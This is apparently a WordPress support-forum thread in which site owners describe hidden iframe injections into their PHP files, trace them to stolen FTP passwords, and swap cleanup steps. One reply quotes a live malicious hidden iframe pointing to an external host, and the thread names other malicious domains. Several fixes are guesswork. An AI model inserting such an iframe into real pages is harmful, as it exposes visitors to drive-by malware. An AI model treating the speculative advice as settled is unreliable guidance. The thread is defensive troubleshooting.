Just had a WordPress site of mine that was hacked earlier this morning, had an iframe directing to lotultimatebet.cn inserted in the main *.php files throughout the site.
Has anyone else experienced this? And does anyone know how to protect against whatever attack was used?
I would like some clarification on changing the database prefix. These are the instructions listed at http://semperfiwebdesign.com/documentation/wp-security-scan/change-wordpress-database-table-name-prefix/ :
1. backup your wordpress database to a sql file (you can use phpmyadmin)
2. open that *.sql file (make another copy first) using text editor, then find and replace all “wp_” prefix to “something_”.
3. now, drop all tables of your wordpress databases (don’t drop the database)
4. import the *.sql file which has been edited before into your wordpress databases.
5. and lastly, edit your wp-config.php file and change the $table_prefix = ‘wp_’; to $table_prefix = ’something_’;
6. you may find that your plugins are deactivated automatically when this happens, so you’ll want to activate them again if that’s the case… I’d recommend deactivating them prior to doing this anyway as a precaution.
Can someone please explain to me what “drop all tables” means? Does that mean “delete”?
I’m desperate here. I’ve been hacked repeatedly, and I’m at the end of my rope. I installed the WP Security Scan plugin and it tells me the only things wrong with my installation are that my prefixes are still set to “wp_” and that “file .htaccess does not exist in wp-admin/”.
Can someone tell me what the latter means, and what I should do about it. And please feel free to speak to me like I’m a 5-year old, because I really do not know what I’m doing with this stuff.
For your reference, here’s what’s been happening, and here’s what I’m using:
Repeatedly hacked by a group called “Red Virus.” They appear to only be messing with the theme header.php file. They don’t appear to be redirecting, or causing any other nefarious stuff to happen. It appears to be just changing the look of the page for attention and giggles. I say “appears” because I don’t know jack about any of this, and God knows how they got in in the first place, so who knows what else they might have done elsewhere in my files.
WP 2.7.1 (up to date)
Atahualpa 3.2 (up to date)
Offical StatCounter Plugin 1.0 (up to date)
Sociable 3.1.1 (up to date)
WP-Spamfree 188.8.131.52 (up to date)
WP Security Scan 2.4 (up to date)
Hello Dolly 1.5
Oh, and just for reference again…
Each time it has happened, I have checked for the creation of new users, and that has not happened. However they’re continuing to get in, it’s not by creating a new user (they do helpfully change my password for me, though!).
And my password this last time was just a bunch of random characters, so it’s unlikely they’re just cracking passwords.
Just discovered my site has been hacked today too. 🙁 The problem first showed when a BadBehavior error message came up, indicating the headers were already sent, so I looked at my page source and saw the header iframe hack, which is showing the source from: worldnamebuy.cn.
Although I can access my website’s home page and other pages, I cannot access my WordPress admin panel when I attempt to login. The last time I accessed my site without any problem was late last week. I thought I would report here one of the last things I did last week from my admin panel, prior to this problem. I deleted 4 spam comments, which Akismet caught, but had gotten past BadBehavior.
Prior to that I had updated my BadBehavior software from within the WordPress admin panel, but unfortunately after doing so I read over on BadBehaviors site that depending on what version of WordPress and BadBehavior you had, that you should instead do the upgrade from within your ftp, not from with the WordPress panel.
I hope my information in regards to what I was doing last on my site before the hack may help someone avoid the same pain, assuming there may be any connection. I also use Firefox with numerous extensions, and will need to check those out.
UPDATE: Found additional iframe hacks and thought I would report here with my findings so far in order to assist others. Two of the files I found that were hacked (WP 2.7.1) were these:
The hacker’s iframe url was the very last line of code in the default filters file, so it could easily be overlooked. Replacing the contaminated default filters php file with a clean one enabled me to get back into my WP Admin panel, whereas I could not get in before. Much to do yet as I have not yet found the vulnerability that allowed the site to get hacked in the first place, but I’m suspecting a plug-in that I installed late last week. Hope this info helps someone!
the iframe hack that I encountered is similar to those hacks posted here, but I have a few more details that I would like to share. The attack scanned all files in the web server (many of which were outside of wordpress and included php sites and also static html sites). The attacking script added an iframe to any files which had index, homepage or default in the filename, so in wordpress, it injected the iframe into index.php, wp-admin/index-extra.php, wp-admin/index.php, wp-content/index.php, the index file for each theme and also in wp-includes/default-filters.php.
I’m not a web security expert, but I did notice that the modified sites were affected in alphabetical order, so I think the script was working through my ftp account. For this reason, I updated my password and switched my ftp service to only work over sftp, which encrypts my password.
Even I’m getting the same error.
I checked my index.php file, found this code added into the file. There many other php file which has been infected with the below code.
// Silence is golden.
<iframe src=”http://2mj.pl:8080/ts/in.cgi?pepsi74″ width=125 height=125 style=”visibility: hidden”></iframe>
This is a FTP password compromise.
Not related to WordPress.
Make sure to upgrade your Adobe Reader to the lastest version. You probably have Adobe Reader 8.0 and using FileZilla.
I am getting the same issue, on not 1 but about 10 of my sites. Some are wordpress and some are .NET sites.
This has been going on for 4 weeks. I am at my wits end.
The wordpress sites continue to become infected, even after I clean them / update them with new clean files. The .NET sites also randomly become infected after they are cleaned.
– I am the only person with access to the websites
– I have reloaded both my laptop and my PC and cleaned them (in case there was some trojan or malware on my pc or laptop).
– I have changed all FTP user/pass a number of times
– I have removed (deleted) entire websites and restored them with clean files
They continue to get this IFRAME injected into them.
This is definitely related to FTP. I have mosso hosting and there are a number of ‘root’ directories accessible from one FTP login. All websites seem to be infected, one right after the other (any files with ‘default’ or ‘index’ in the file name).
I do have a few of the websites at a point where they are not getting infected. It seems that if you can remove all those nasty IFRAMES, then you should be in the clear…although I cant be sure.
I feel everyone’s pain…this is very frustrating. Please ping me if anyone finds a surefire fix and I’ll do the same. Many thanks.
Thank goodness it’s not just me who is experiencing this issue with the iframe hack.
Yesterday my blog was fine, today my homepage had a PHP parse error. I investigated and found the same thing, iframe code added to the bottom of heaps of pages.
I thought I got rid of all the affected pages but every change I made threw up a new error.
POSSIBLE FIRST?: Not sure if anyone else has experienced this (i’ll be honest and admit I have not read every post above this!), but it could be a possible first or new approach for this hack.
Not only did I get the iframe code inserted on the pages (mostly index.php but also heaps of others, even in the GD Star Rating plugin I use) but it also truncated lots of legit code on the page (possibly due to where it was inserted?).
Anyway, I got sick of chasing down the code as it seems it’s been inserted everywhere. I took extreme action and deleted my WP installation and SQL database (after backing up what I needed; blog entries, jpg images etc) and am presently reinstalling and configuring my blog all over again.
Thankfully I am blessed with the fact my blog is relatively new. I can quickly repost and have the tweaked php code (where applicable) I made for customising the theme I use (Modicus remix) so hopefully I should be up and running again soon.
Further I have now changed all usernames and passwords using an online password generator so now all my usernames and logins etc are insanely long and complex. Feck it, it’s worth it so I hopefully do not have to go through this again. I feel for you all!
FYI: I also use Filezilla (latest version) but do not use Adobe Reader, rather Foxit instead (much better I think).
FYI2: I got a virus on my system the day before I discovered this problem. It was that bad I had to format my computer and reinstall WindowsXP. I am not sure if the virus I picked up could have contributed to the hack(?) as my blog was fine last night when I checked my Wassup stats.
I think it doesn’t matter if you use Adobe Reader or not.
I want to know if the Adobe Reader program exist in your computer. If so, what version? If not, my theory on Adobe 8 and Fizezilla hack is wrong.
I got hit too. Several sites, similar symptoms. Oddly enough not every site on my server was affected. Looks like trojan hack as I had a bunch of AVG warnings pop up when I went to read the news about thepiratebay getting sold. Looks like one of them got through and stole the passwords I had stored in Filezilla. 🙁 I have Adobe 7 reader installed, but I don’t think that matters. Another person I talked to uses cuteftp and he got hacked too. I would wager that it doesn’t matter which ftp software you’re using. If it’s popular, they’re probably targeting it.
I’m probably just going to format and reinstall windows on the desktop machine that was compromised and then restore backups on the web servers, change passwords, etc.
If you want to chat about things, share info, etc. Join us on Freenode (irc.freenode.com) in channel #microsotf.cn If you don’t have an irc client, you can use the webchat: http://java.freenode.net//index.php?channel=microsotf.cn
A good friend of mine was hit too. He found it odd that all of HIS sites were being affected, but nobody else and he blamed wordpress himself, he did a backup and removed it.
After figuring out that there was no scripts on his server (server side) php OR cgi or whatever, he finally realized that it was being done via FTP.
From what I’ve read around, this is a vulnerability allowing for remote code execution, including but not limited to Key Loggers.
The issue went away when I had my friend download a linux live CD, Slax, http://www.slax.org and he was able to use the available Avast! Antivirus and it cleaned quite a few viruses / trojans, he then changed ALL ftp passwords, and his web hosts control panel password, all within Linux.
Another idea would be if you have a web host with a control panel, see if the attackers had created any additional FTP accounts (which are in many cases available).
As a note, however, Linux is not impervious to viruses but most virus programmers will attack the masses (Windows).
The strangest part however of the whole thing – is that the iframes that were injected into the wordpress files, didn’t come complete, missing key elements, thus they actually BROKE wordpress.
I am unsure how this happened, but this behavior actually HELPED me to figure out what the issue is.
Best of luck to everyone who has this issue, I will shortly be putting together a blog post to help those who are having this issue work through it.
If you are having trouble removing the scripts from your pages and/or getting your site back into Google’s good graces, you might want to check out http://www.iframehack.com . Their blog provides quite a bit of information on the hack, including a list of the domains that these hidden iframes are directing traffic to, and provide a service that removes the malicious content from all of the pages on your site that were affected by the virus/trojan and assists with getting the site reincluded in Google results and having the “attack site” label removed.
Hope this helps someone!
I think it is not wordpress code but some trojan on windows machine which keeps a watch on your network layer and scans all communication.
I could figure out this when i asked for ftp log from hosting service provider. My login details were available from all over the world and even while i was sleeping 🙁
What to do when your website is infected with such iframe malware
1. Immediately change your ftp passwords.
2. Clean up your local machine from all the viruses, trojans, malware, rootkits etc.
3. Install good antivirus with updates and firewall with limited ports open.
4. do netstat to keep a watch on invalid trojan operation running in background.
5. Hope you have backup of your site. If yes then login to your website and delete all the content.
6. if you do not have backup download all the files from your website and scan for iframes. Remove unwanted iframes or malware tags.
7. upload the correct copy of files to the server.
As DeepJava says, clean up local machine first. (rootkits, keyloogers). One way that hackers get in to your data base is by making randon queries to your website and reading the information Apache provides in error messages. You can make an error page (html. Or I suppose a page on wordpress) In htaccess file place this lines:
allow from all
ErrorDocument 400 /errorPage.html
ErrorDocument 401 /errorPage.html
ErrorDocument 403 /errorPage.html
ErrorDocument 404 /errorPage.html
ErrorDocument 500 /errorPage.html`
I’ve just put all the error codes so you don’t have to look them up. Test this by typing your url then anything like
mydomain.com/anythingand see what happens.
Forms are used to get the Apache server to deliver error codes. Remember you can upgrade, or reinstall, at anytime – just tell the automated response to – do it anyway.
- The topic ‘WordPress hacked’ is closed to new replies.